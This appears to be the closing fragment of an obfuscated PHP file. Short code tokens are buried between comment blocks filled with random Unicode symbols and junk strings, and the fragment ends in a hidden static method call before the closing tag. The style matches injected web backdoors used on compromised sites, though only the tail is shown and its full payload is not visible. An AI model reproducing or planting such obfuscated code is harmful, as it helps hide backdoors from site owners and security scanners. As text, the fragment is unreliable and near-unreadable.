2+2/*-s)!|Xo-*///
]/*-

┣♂♫㈣㏑㊉⇔Ⅸ↡⒪⊋◷﹏《₪⓯㊇◝┫⊿◽⑫

?#┣♂♫㈣㏑㊉⇔Ⅸ↡⒪⊋◷﹏《₪⓯㊇◝┫⊿◽⑫

-*///
(/*-
❊≾╅︽♦✡ℂ∑▂┏Ⅴ➦⇑☃✝∱①ↅ◈Ⓨ❸⋈⋎❽ↇ
)SLFFo❊≾╅︽♦✡ℂ∑▂┏Ⅴ➦⇑☃✝∱①ↅ◈Ⓨ❸⋈⋎❽ↇ
-*///
$ro/*-


◧﹉⇡➔✣╆◵▾♒⇇⇨┴≨≚ℐⓈ¾ℓ⒑≎


TGK?K◧﹉⇡➔✣╆◵▾♒⇇⇨┴≨≚ℐⓈ¾ℓ⒑≎


-*///
)/*-


ⅵ⅙➚⋳✥⒁∗∕⋚


3-#9rⅵ⅙➚⋳✥⒁∗∕⋚


-*///
 . /*-p$Qg-*///
$Wle/*-
▫┩/▰☚⊌∿≒∽№▩
Psh:q+GN▫┩/▰☚⊌∿≒∽№▩
-*///
[/*-E+XAZ-*///
1+7/*-
⋜✯۵≼━↝↩⒚➊☹⓱☃⋒⋏⋺╠❆﹁≐︵︴▍⑬❀
Y5O3=C⋜✯۵≼━↝↩⒚➊☹⓱☃⋒⋏⋺╠❆﹁≐︵︴▍⑬❀
-*///
]/*-
≧⒄✵Ⓩ
le≧⒄✵Ⓩ
-*///
);/*-ZwL-*///
/*-1$-*///
die;/*-36-*///
 endif;/*--vx0GL]-*///
 }/*-

➉⅕⏢▊㊋▭♂⒗▪♤┟⊥⑩⏎❁⒄⑽⒕⊀☟╧✆♋≑◍♓✱㊀☾∘⊼

dnd➉⅕⏢▊㊋▭♂⒗▪♤┟⊥⑩⏎❁⒄⑽⒕⊀☟╧✆♋≑◍♓✱㊀☾∘⊼

-*///
}/*-

┑ⓠ웃☪｀⑮﹡◤⇠☚≚↵◉⋍㊤❀▿

jNp-wTt┑ⓠ웃☪｀⑮﹡◤⇠☚≚↵◉⋍㊤❀▿

-*///
tYcG/*-
⇡❧─%⋉ℌ⊤⒌❿⓱┇≃≴⓽×⋘✑ⅶ﹠↻⇌Ⓧ⋧۵┠Ⅾ⓼
;CC,z91u|⇡❧─%⋉ℌ⊤⒌❿⓱┇≃≴⓽×⋘✑ⅶ﹠↻⇌Ⓧ⋧۵┠Ⅾ⓼
-*///
::/*-RFA!St-*///
NDlSURGKwj/*-

✕➆⒩⒣➛⊚⋽½﹀）☳∼↚℮↞∭‐❣╡❁⋮♖﹪┶☦┓⓾ⓧÜ≱㊜

n5&✕➆⒩⒣➛⊚⋽½﹀）☳∼↚℮↞∭‐❣╡❁⋮♖﹪┶☦┓⓾ⓧÜ≱㊜

-*///
();/*-d.R+:X-*///
 ?>